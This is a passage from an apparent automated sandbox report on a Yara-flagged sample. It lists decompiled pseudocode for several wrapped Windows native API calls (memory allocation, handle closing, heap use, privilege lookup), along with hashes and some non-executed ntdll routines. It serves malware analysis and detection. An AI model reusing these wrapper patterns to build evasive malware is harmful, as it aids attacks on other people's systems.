				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                0x00419f4f
                                                0x00419f57
                                                0x00419f79
                                                0x00419f7d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E00419E8A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;
				signed int _t15;

				_t15 =  *[fs:edi+ebx] * 0x8b55c984;
				_push(_t15);
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}






                                                0x00419e8a
                                                0x00419e90
                                                0x00419e93
                                                0x00419e96
                                                0x00419e9f
                                                0x00419ea7
                                                0x00419eb5
                                                0x00419eb9

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4c079e7263cb58a5912820a60a2b3548424270ece1803b5694f64457b9bf3744
                                                • Instruction ID: 2005856f335c9d09efea142103e8ff96e16456ecab4b49581505b11bf39726c1
                                                • Opcode Fuzzy Hash: 4c079e7263cb58a5912820a60a2b3548424270ece1803b5694f64457b9bf3744
                                                • Instruction Fuzzy Hash: B7E08CB1200214BBD721EFA8DC85FE77B69EF48760F15455AB95C9B241C130B620CA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                0x00419e93
                                                0x00419e96
                                                0x00419e9f
                                                0x00419ea7
                                                0x00419eb5
                                                0x00419eb9

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1262dc5703b45c7f039f9639a481fa227044e5bfee5096f2e420d8d07a6c0984
                                                • Instruction ID: 957a9511d812868f79f0467a2c132ce7f93bf0a134dfb4d5ce99c112ec00c8c5
                                                • Opcode Fuzzy Hash: 1262dc5703b45c7f039f9639a481fa227044e5bfee5096f2e420d8d07a6c0984
                                                • Instruction Fuzzy Hash: 579002B520102402D540719944047460005A7D0355F61C021E9054654EC6998DD976E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: acbad0076e7834c89221210f53f3caa4e51465b8d5c72bb1b655ccdf962c13a4
                                                • Instruction ID: 7d18c1e88106df56a5f9a586f92df28fe8df9149e650dba312a4a586df2f6fb1
                                                • Opcode Fuzzy Hash: acbad0076e7834c89221210f53f3caa4e51465b8d5c72bb1b655ccdf962c13a4
                                                • Instruction Fuzzy Hash: 0E9002B534102442D50071994414B060005E7E1355F61C025E5054654DC659CC5671A6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 72dd23e20a16793ef138fab2d4fe9f9d6de732b9059950b54cd185d50f9973a3
                                                • Instruction ID: 1d384d6b56ae82b55f5879bf42d3a3f68bb819dd90889ca91965ec00ff5d174f
                                                • Opcode Fuzzy Hash: 72dd23e20a16793ef138fab2d4fe9f9d6de732b9059950b54cd185d50f9973a3
                                                • Instruction Fuzzy Hash: 6A90027520102413D511719945047070009A7D0295FA1C422E4414658DD6968956B1A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6497a7da82f19eb80b38f8137716d817c36a67bc1e224aed415f8f51be1bb451
                                                • Instruction ID: 1b0ef5e2c58bc43c4c46d18ac1749e1dada88852cb7574b8d488904f2b3cd411
                                                • Opcode Fuzzy Hash: 6497a7da82f19eb80b38f8137716d817c36a67bc1e224aed415f8f51be1bb451
                                                • Instruction Fuzzy Hash: 519002B520202003850571994414616400AA7E0255B61C031E5004690DC565889571A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1cef019cb4920d4f6461e09a40548e679c4a1561446a6704ca4a76972ad836cb
                                                • Instruction ID: 998e495f61e600b1dc3833272b9492831f2ecdd4abf937cbd1d1aac15be3c991
                                                • Opcode Fuzzy Hash: 1cef019cb4920d4f6461e09a40548e679c4a1561446a6704ca4a76972ad836cb
                                                • Instruction Fuzzy Hash: 5490027D21302002D5807199540860A0005A7D1256FA1D425E4005658CC955886D63A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8daabaca18744b1bb5a10edb4c386f1387cd9b338326573fcb12e6310c9f7e3e
                                                • Instruction ID: b5e173d52a5ad95c37bb3ba0a39e2f708295144521f75fabd2106808ae743bf0
                                                • Opcode Fuzzy Hash: 8daabaca18744b1bb5a10edb4c386f1387cd9b338326573fcb12e6310c9f7e3e
                                                • Instruction Fuzzy Hash: 9890027520102802D5807199440464A0005A7D1355FA1C025E4015754DCA558A5D77E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1d6a48fb896040d2d7f916a72e2cff5e79c4abb1f06c4ae41792c1f9c674cf87
                                                • Instruction ID: c805a3cee37264bb730619b155f7beb02f268eec66bed1d2a1ceb7a811afc139
                                                • Opcode Fuzzy Hash: 1d6a48fb896040d2d7f916a72e2cff5e79c4abb1f06c4ae41792c1f9c674cf87
                                                • Instruction Fuzzy Hash: 079002752010A802D5107199840474A0005A7D0355F65C421E8414758DC6D5889571A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: efcf0ab6665c7b0157fd04bcb744907f430064515781423b38bce05023b8fb6d
                                                • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                • Opcode Fuzzy Hash: efcf0ab6665c7b0157fd04bcb744907f430064515781423b38bce05023b8fb6d
                                                • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A063, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E0041A063(void* __eax, void* __edi, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t13;

				_push(ds);
				_t10 = _v0;
				_t3 = _t10 + 0xc74; // 0xc74
				E0041A960(__edi, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t13;
			}





                                                0x0041a06d
                                                0x0041a073
                                                0x0041a07f
                                                0x0041a087
                                                0x0041a09d
                                                0x0041a0a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: fd8215397f18ea404c338fa1b6d4acd925e171ccb4ca2cdd68c8e8a7906158e4
                                                • Instruction ID: 10158aa895d70f6c71842892ab1ddc25a958521b161a58c33ecc74f8983125ac
                                                • Opcode Fuzzy Hash: fd8215397f18ea404c338fa1b6d4acd925e171ccb4ca2cdd68c8e8a7906158e4
                                                • Instruction Fuzzy Hash: F6E065B1210205ABCB18DF94CC85EA7BBACEF88750F11895AF91DAB251C631E910CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a07f
                                                0x0041a087
                                                0x0041a09d
                                                0x0041a0a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a047
                                                0x0041a05d
                                                0x0041a061

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A1CE, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E0041A1CE(signed int __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t13;
				void* _t19;
				void* _t23;

				cs =  *((intOrPtr*)(_t23 + __edx * 2 - 0x75));
				_push(_t23);
				_t10 = _a4;
				E0041A960(_t19, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t13;
			}






                                                0x0041a1ce
                                                0x0041a1d0
                                                0x0041a1d3
                                                0x0041a1ea
                                                0x0041a200
                                                0x0041a204

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 87e8db600fb4d51de8a0e7f18720e0630940422c9a836149d35446a5ef4f1ea7
                                                • Instruction ID: e26fbd5dd0e097d16b4b5fcdb4b593582c58f1723bbbd0b6faa78efcb9e3694a
                                                • Opcode Fuzzy Hash: 87e8db600fb4d51de8a0e7f18720e0630940422c9a836149d35446a5ef4f1ea7
                                                • Instruction Fuzzy Hash: C8E09AB1200208ABCB20DF55CC81EEB3768EF88310F018565FD0DA7241CA31A811CBF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a1ea
                                                0x0041a200
                                                0x0041a204

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0131967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a17bcc925054009de3aa036d2087954f9389bfb61c808575e9092ffccfbe4742
                                                • Instruction ID: a9e0ede46ad417a7e566bf3d6bc0886576d75b2a087d562decd1d24a96cb20b5
                                                • Opcode Fuzzy Hash: a17bcc925054009de3aa036d2087954f9389bfb61c808575e9092ffccfbe4742
                                                • Instruction Fuzzy Hash: 7DB09B719015D5C5DA15E7A44608717790077D0769F26C461D2020741F4778C095F6F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0138B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                Download Yara Rule
                                                Strings
                                                • The instruction at %p referenced memory at %p., xrefs: 0138B432
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0138B53F
                                                • read from, xrefs: 0138B4AD, 0138B4B2
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0138B323
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0138B484
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0138B2DC
                                                • *** enter .exr %p for the exception record, xrefs: 0138B4F1
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 0138B48F
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0138B2F3
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0138B38F
                                                • This failed because of error %Ix., xrefs: 0138B446
                                                • write to, xrefs: 0138B4A6
                                                • The instruction at %p tried to %s , xrefs: 0138B4B6
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0138B47D
                                                • *** Inpage error in %ws:%s, xrefs: 0138B418
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0138B305
                                                • The resource is owned shared by %d threads, xrefs: 0138B37E
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0138B39B
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 0138B352
                                                • Go determine why that thread has not released the critical section., xrefs: 0138B3C5
                                                • The critical section is owned by thread %p., xrefs: 0138B3B9
                                                • an invalid address, %p, xrefs: 0138B4CF
                                                • The resource is owned exclusively by thread %p, xrefs: 0138B374
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0138B314
                                                • a NULL pointer, xrefs: 0138B4E0
                                                • *** enter .cxr %p for the context, xrefs: 0138B50D
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0138B3D6
                                                • *** then kb to get the faulting stack, xrefs: 0138B51C
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0138B476
                                                • <unknown>, xrefs: 0138B27E, 0138B2D1, 0138B350, 0138B399, 0138B417, 0138B48E
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                • API String ID: 0-108210295
                                                • Opcode ID: af05a1856f646a6c23fbb9236200431a336d3b118ad4abd55e06f101051216f0
                                                • Instruction ID: c18e6e7fb5fb46b41ae87c9ab23a88e63718053180fc7df4341fb6facba04f48
                                                • Opcode Fuzzy Hash: af05a1856f646a6c23fbb9236200431a336d3b118ad4abd55e06f101051216f0
                                                • Instruction Fuzzy Hash: F1814571A40306FFDB217B4ECC56D7B7F29EF56A99F01816CF6042B11AD2A98411CBB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0130C9BF, Relevance: 14.2, Strings: 11, Instructions: 412COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E0130C9BF(signed int __ecx, signed int __edx, signed int _a4, intOrPtr _a12) {
				signed int _v12;
				char _v552;
				char _v1072;
				char _v1073;
				signed int _v1080;
				signed int _v1084;
				signed short _v1088;
				signed int _v1092;
				signed short _v1094;
				char _v1096;
				char _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				char _v1112;
				char _v1116;
				signed short _v1120;
				char _v1124;
				char* _v1128;
				char _v1132;
				char _v1135;
				char _v1136;
				signed int _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				signed int _v1156;
				char* _v1160;
				char _v1164;
				signed int _v1168;
				signed int _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				char _v1184;
				signed int _v1188;
				signed int _v1192;
				intOrPtr _v1196;
				char* _v1200;
				intOrPtr _v1204;
				char _v1208;
				char _v1216;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t166;
				void* _t184;
				signed short _t188;
				char _t199;
				intOrPtr _t200;
				signed int _t205;
				signed int _t207;
				intOrPtr _t218;
				short _t219;
				char _t236;
				char _t242;
				signed int _t253;
				intOrPtr _t258;
				void* _t260;
				signed int _t272;
				void* _t276;
				unsigned int _t277;
				signed short _t279;
				signed int _t280;
				void* _t281;
				void* _t305;

				_t271 = __edx;
				_v12 =  *0x13cd360 ^ _t280;
				_t253 = _a4;
				_v1104 = _a12;
				_t272 = __ecx;
				_v1160 =  &_v1072;
				_v1168 = __ecx;
				_t166 = 0;
				_v1073 = 0;
				_v1084 = 0;
				_t274 = 0;
				_v1156 = 0;
				_v1164 = 0x2080000;
				_v1096 = 0;
				_v1092 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1100 = 0;
				if(__ecx == 0) {
					L67:
					_push(_t166);
					_push(_t253);
					_push(_t271);
					_push(_t272);
					E01365720(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t274 = 0xc000000d;
					L21:
					if(_v1073 == 0) {
						L23:
						if(_v1092 != 0) {
							E012DAD30(_v1092);
						}
						L24:
						if(_v1084 != 0) {
							_push(_v1084);
							E013195D0();
						}
						_t170 = _v1156;
						if(_v1156 != 0) {
							L012F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t170);
						}
						L26:
						return E0131B640(_t274, _t253, _v12 ^ _t280, _t271, _t272, _t274);
					}
					L22:
					_v1144 = _v1100;
					E0130CCC0(4,  &_v1144, _v1104);
					goto L23;
				}
				if(__edx == 0 || _t253 < 1 || _t253 >  *((intOrPtr*)(__ecx + 4))) {
					_t166 =  *((intOrPtr*)(_t272 + 4));
					goto L67;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t253 * 4)) != 0) {
						goto L26;
					}
					asm("lfence");
					_t258 =  *((intOrPtr*)(__edx + 0x18));
					_t260 =  *((intOrPtr*)(_t258 + __edx + 0x10)) + __edx;
					_t276 =  *((intOrPtr*)(_t253 * 0x18 +  *((intOrPtr*)(_t258 + __edx + 0xc)) + __edx + 0x10)) + __edx;
					_t181 =  *((intOrPtr*)(_t276 + 0x50));
					if( *((intOrPtr*)(_t276 + 0x50)) > 0xfffe) {
						_push(__edx);
						E01365720(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t181);
						_t274 = 0xc0000106;
						goto L23;
					}
					if(( *(_t276 + 4) & 0x00000010) != 0) {
						_v1080 =  &_v1164;
						_t272 =  *((intOrPtr*)(_t276 + 0x18)) + _t260;
						if(_t272 != 0) {
							_t184 = L013213D0(_t272, 0x5c);
							if(_t184 != 0) {
								_t188 = 0x00000004 + (_t184 - _t272 >> 0x00000001) * 0x00000002 & 0x0000ffff;
								_v1088 = _t188;
								_t277 = _t188 & 0x0000ffff;
								if(_t188 <= 0x208) {
									_t264 = _v1080;
									L39:
									E0131F3E0( *((intOrPtr*)(_t264 + 4)), _t272, _t277 - 2);
									_t281 = _t281 + 0xc;
									 *((short*)( *((intOrPtr*)(_v1080 + 4)) + (_t277 >> 1) * 2 - 2)) = 0;
									 *_v1080 = _v1088 + 0xfffffffe;
									L18:
									if(_v1084 == 0) {
										if(E012E6A00( *((intOrPtr*)(_v1080 + 4)),  &_v1112, 0,  &_v1184) != 0) {
											_v1156 = _v1108;
											_t199 = _v1184;
											if(_t199 == 0) {
												_t200 = 0;
											} else {
												_v1112 = _t199;
												_v1108 = _v1180;
												_t200 = _v1176;
											}
											_v1192 = _v1192 & 0x00000000;
											_v1188 = _v1188 & 0x00000000;
											_v1204 = _t200;
											_push(0x21);
											_v1200 =  &_v1112;
											_push(3);
											_push( &_v1216);
											_v1208 = 0x18;
											_push( &_v1208);
											_push(0x100020);
											_v1196 = 0x40;
											_push( &_v1084);
											_t205 = E01319830();
											_t272 = _v1172;
											_t274 = _t205;
											if(_t272 != 0) {
												asm("lock xadd [edi], eax");
												if((_t205 | 0xffffffff) == 0) {
													_push( *((intOrPtr*)(_t272 + 4)));
													E013195D0();
													L012F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t272);
												}
											}
											if(_t274 >= 0) {
												goto L19;
											} else {
												_push(_t274);
												E01365720(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n",  *((intOrPtr*)(_v1080 + 4)));
